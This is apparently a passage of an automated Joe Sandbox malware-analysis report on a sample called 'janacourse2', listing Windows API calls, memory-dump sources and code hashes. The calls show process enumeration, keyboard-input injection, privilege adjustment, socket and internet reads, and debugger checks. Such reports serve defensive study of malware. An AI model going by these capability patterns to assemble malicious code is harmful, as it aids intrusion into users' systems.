                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1972594611-438819550
                                                                                                            • Opcode ID: 217cdf113ff61ad54d28ecdb207320200e6aa2276af1acf1bf375ec7f1a917ab
                                                                                                            • Instruction ID: 2e0369adc3cd862838fcfbba907f2a928e8eba06d2ecb68b97ce7eefe433a004
                                                                                                            • Opcode Fuzzy Hash: 217cdf113ff61ad54d28ecdb207320200e6aa2276af1acf1bf375ec7f1a917ab
                                                                                                            • Instruction Fuzzy Hash: A241D27190022EAFEF51DF64C985AEE7BF8FF05304F24409AE945A3191EB309A84CF60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FC9A4E
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00FC9B23
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00FC9B36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3131106179-0
                                                                                                            • Opcode ID: 9e855eff11f10b20e127b6ecfc0c963a333850f41ddba7926ea039accc6403f5
                                                                                                            • Instruction ID: 0cfb2d5f68cc08db747fd0a5292e42f8b513c8d5c661b6a3bff64fba80273d71
                                                                                                            • Opcode Fuzzy Hash: 9e855eff11f10b20e127b6ecfc0c963a333850f41ddba7926ea039accc6403f5
                                                                                                            • Instruction Fuzzy Hash: 4CA107B150C046BEF7299A2C8E8EFBF399DEB46350F14015DF1C2965C5CAAD9D01E271
                                                                                                            APIs
                                                                                                              • Part of subcall function 0103304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
                                                                                                              • Part of subcall function 0103304E: _wcslen.LIBCMT ref: 0103309B
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0103185D
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031884
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 010318DB
                                                                                                            • WSAGetLastError.WSOCK32 ref: 010318E6
                                                                                                            • closesocket.WSOCK32(00000000), ref: 01031915
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1601658205-0
                                                                                                            • Opcode ID: 35c5c0fb6b9b2b90555d0a2b5382b6d52aa15aea56f89d1f22e7a7a42f251ca8
                                                                                                            • Instruction ID: f054d06d3f756f28639abf46a1af8cda090f1646102056bd7710bc1b5656295b
                                                                                                            • Opcode Fuzzy Hash: 35c5c0fb6b9b2b90555d0a2b5382b6d52aa15aea56f89d1f22e7a7a42f251ca8
                                                                                                            • Instruction Fuzzy Hash: 46519875A002109FE710EF24C986F6A77E59B88718F08849CF9455F3C7C779AD418BE1
                                                                                                            APIs
                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CF38
                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0102CF6F
                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFB4
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFC8
                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0102C21E,00000000), ref: 0102CFF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 3191363074-0
                                                                                                            • Opcode ID: 3a9a5717d0b4e7e41a22716ec17c3baad946b4bb9a4dc6b87643e587d328428b
                                                                                                            • Instruction ID: 528852196e3a52e0fe373598d6067e7251f1d6426e0185d71739df9c492270ec
                                                                                                            • Opcode Fuzzy Hash: 3a9a5717d0b4e7e41a22716ec17c3baad946b4bb9a4dc6b87643e587d328428b
                                                                                                            • Instruction Fuzzy Hash: 43318EB1500615EFFBA0DFA9CA84EAFBBF8EF04350B10446EF596D2141DB34AA45DB60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 292994002-0
                                                                                                            • Opcode ID: 18b75485c7a56137b7b90ed25d2c72ab5927d67e7a5db5f12b6348ef3fb4b3ae
                                                                                                            • Instruction ID: 0c7f8554864299479850b9bf938ef867280de0b4adb41c56585d8f515e09e4a0
                                                                                                            • Opcode Fuzzy Hash: 18b75485c7a56137b7b90ed25d2c72ab5927d67e7a5db5f12b6348ef3fb4b3ae
                                                                                                            • Instruction Fuzzy Hash: E321D6B17012055FE7209F1AD9C4B6A7BE5EF89315F1880B8E8C98B341C776F882CB94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                            • API String ID: 0-1546025612
                                                                                                            • Opcode ID: d270e174050309dc2360b6d72472cfd92d785ffcbe21d7b453c724c2363f4cbe
                                                                                                            • Instruction ID: 299b0f01062941b78e92fea72956a549a9f060c9ec9ff328a09c7ac26a27de93
                                                                                                            • Opcode Fuzzy Hash: d270e174050309dc2360b6d72472cfd92d785ffcbe21d7b453c724c2363f4cbe
                                                                                                            • Instruction Fuzzy Hash: A8A27B71E0021ACBDF24CF59C8407FDB7B5AF94764F2481AADA15A7294DB309D82EF90
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0103A6AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0103A6BA
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0103A79C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103A7AB
                                                                                                              • Part of subcall function 00FCCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FF3303,?), ref: 00FCCE8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1991900642-0
                                                                                                            • Opcode ID: c1f9f8796a6c9f46f2651c1b33b2c1375d93ed3b9c3f19eef4fb928b5990a1b9
                                                                                                            • Instruction ID: 9591fdd5f8f13ee471d2af6c822303403547c6e0d7c174fd7e7d6bf6b83ab9ef
                                                                                                            • Opcode Fuzzy Hash: c1f9f8796a6c9f46f2651c1b33b2c1375d93ed3b9c3f19eef4fb928b5990a1b9
                                                                                                            • Instruction Fuzzy Hash: 2F5169B1508301AFD710EF25CD86AABBBE8FF89714F00891DF58597251EB39D904DB92
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0101ABF1
                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0101AC0D
                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0101AC74
                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0101ACC6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: 2f30d33ffb5f2dcd955031d2cf66efbbd1f3fdb4063a9e962ac19c98474737ea
                                                                                                            • Instruction ID: 1287e0e7cdc60f8d93d43670a2d9a3fb39d2edfab8ab083887bcf755f3a50fc7
                                                                                                            • Opcode Fuzzy Hash: 2f30d33ffb5f2dcd955031d2cf66efbbd1f3fdb4063a9e962ac19c98474737ea
                                                                                                            • Instruction Fuzzy Hash: 1D311470B0129CEFFF358A6988147FE7AE5AB89320F04425AE4C5932D9D37D85858791
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FEBB7F
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00FEBB91
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0108121C,000000FF,?,0000003F,?,?), ref: 00FEBC09
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,01081270,000000FF,?,0000003F,?,?,?,0108121C,000000FF,?,0000003F,?,?), ref: 00FEBC36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 806657224-0
                                                                                                            • Opcode ID: 71ca21a603c42bc940fd43b5eed74ab34d5847a3f785a8e994bf9bd509b7c5ee
                                                                                                            • Instruction ID: 3aa04fe6f5a930c4b223f9f19fd3a21f93bfa5d89213eaae68d4aff2dd6efe41
                                                                                                            • Opcode Fuzzy Hash: 71ca21a603c42bc940fd43b5eed74ab34d5847a3f785a8e994bf9bd509b7c5ee
                                                                                                            • Instruction Fuzzy Hash: FD31A5B1D08285DFCB21DF6ADC8156EBBB8FF45320714425AE0D0D72A5D7359D11EB50
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,00FF5222), ref: 0101DBCE
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0101DBDD
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101DBEE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101DBFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2695905019-0
                                                                                                            • Opcode ID: df650e0f555a96af76f05aba5ffacf151418927b0df3577da346f669a1e525d8
                                                                                                            • Instruction ID: 4750fe9ef2a02a01df119dff16373beb5f5f390ab9f715962a9852cad36d92ac
                                                                                                            • Opcode Fuzzy Hash: df650e0f555a96af76f05aba5ffacf151418927b0df3577da346f669a1e525d8
                                                                                                            • Instruction Fuzzy Hash: 9FF0EC7441191597A3306BBC9F4D4AA37AC9F01334B104B42F5F5C10E4EBF9595487D5
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 010182AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen
                                                                                                            • String ID: ($|
                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                            • Opcode ID: b2228780fbb2cd32382b3f461d4ab8dce45bbd34b4e17af89a874a2de35cee35
                                                                                                            • Instruction ID: 8867a19adc1518d5011fb31ad30748ee444769a254c286ee101210e22c423ba1
                                                                                                            • Opcode Fuzzy Hash: b2228780fbb2cd32382b3f461d4ab8dce45bbd34b4e17af89a874a2de35cee35
                                                                                                            • Instruction Fuzzy Hash: 6B323674A007059FDB28CF59C481A6AB7F0FF48310B15C5AEE99ADB3A5E774EA41CB40
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 01025CC1
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 01025D17
                                                                                                            • FindClose.KERNEL32(?), ref: 01025D5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: ba50074bc3937f3d3d53b112c67b95d43c8407690b5d3d621f179556df8922fd
                                                                                                            • Instruction ID: cdd90ca96e01d2c00d38ca6e0499fe8a019ce1ea9896f9b2b481df7545bc4c6f
                                                                                                            • Opcode Fuzzy Hash: ba50074bc3937f3d3d53b112c67b95d43c8407690b5d3d621f179556df8922fd
                                                                                                            • Instruction Fuzzy Hash: A551BB746046019FD324DF28C894E9AB7E4FF49314F14859EEA9A8B3A2CB34E905CF91
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00FE271A
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FE2724
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00FE2731
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: ff05fe2eee98c580520ca5c81a6a0c0f2b12e6da27534f7527f36860ec4b8832
                                                                                                            • Instruction ID: 1a4fc8bb68a32aa02cbc7686de97eabf21585f41107b70d6d36397afb3446d33
                                                                                                            • Opcode Fuzzy Hash: ff05fe2eee98c580520ca5c81a6a0c0f2b12e6da27534f7527f36860ec4b8832
                                                                                                            • Instruction Fuzzy Hash: 0331D57490121CABCB61DF64DD8879CB7B8AF08310F5041EAE40CA7260EB349F819F44
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 010251DA
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01025238
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 010252A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1682464887-0
                                                                                                            • Opcode ID: 0afb903a804c613a31441ce3e2c42c3a1b962efd3d344149b9d4493aca5c2108
                                                                                                            • Instruction ID: 2a75db941b01b77ba401c4b69913703db0f4ab7728d99f79186b314c15157ff4
                                                                                                            • Opcode Fuzzy Hash: 0afb903a804c613a31441ce3e2c42c3a1b962efd3d344149b9d4493aca5c2108
                                                                                                            • Instruction Fuzzy Hash: 5B314B75A001189FDB00DF54D884EEDBBB4FF49314F188099E945AB396DB36E859CBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0668
                                                                                                              • Part of subcall function 00FCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0685
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
                                                                                                            • GetLastError.KERNEL32 ref: 0101174A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 577356006-0
                                                                                                            • Opcode ID: b72ebb88038974b96249a93ec3e733ec32b791f4d326d4e86b3bec5d3ef92f53
                                                                                                            • Instruction ID: 526310bb1d220b47d85e8ef2e27f37c50b88315f78f1109e87de01fd4f21ecaf
                                                                                                            • Opcode Fuzzy Hash: b72ebb88038974b96249a93ec3e733ec32b791f4d326d4e86b3bec5d3ef92f53
                                                                                                            • Instruction Fuzzy Hash: C311CEB2400305AFE7289F64EDC6E6ABBF9FB04714B20852EF59653245EB75BC418B20
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101D608
                                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0101D645
                                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101D650
                                                                                                            Memory Dump Source
